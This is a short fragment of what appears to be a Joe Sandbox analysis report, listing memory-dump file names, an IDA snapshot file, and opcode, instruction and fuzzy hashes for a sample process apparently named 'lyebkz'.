                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: jnA
                                    • API String ID: 0-1084530891
                                    • Opcode ID: 06c685992ed81abcdd28e7a9ba09939712f17309341ec8514fed347b4ec3ac22
                                    • Instruction ID: 11554d1898023042fa36dd5a355d85e9618b4c3a92d74d7d2eda7fd56a64b685
                                    • Opcode Fuzzy Hash: 06c685992ed81abcdd28e7a9ba09939712f17309341ec8514fed347b4ec3ac22
                                    • Instruction Fuzzy Hash: 12F08C71600208BADF219F50DD02BF937B5EB44748F008066FD19C91D1E6F9DAE0D399
                                    Uniqueness

                                    Uniqueness Score: -1.00%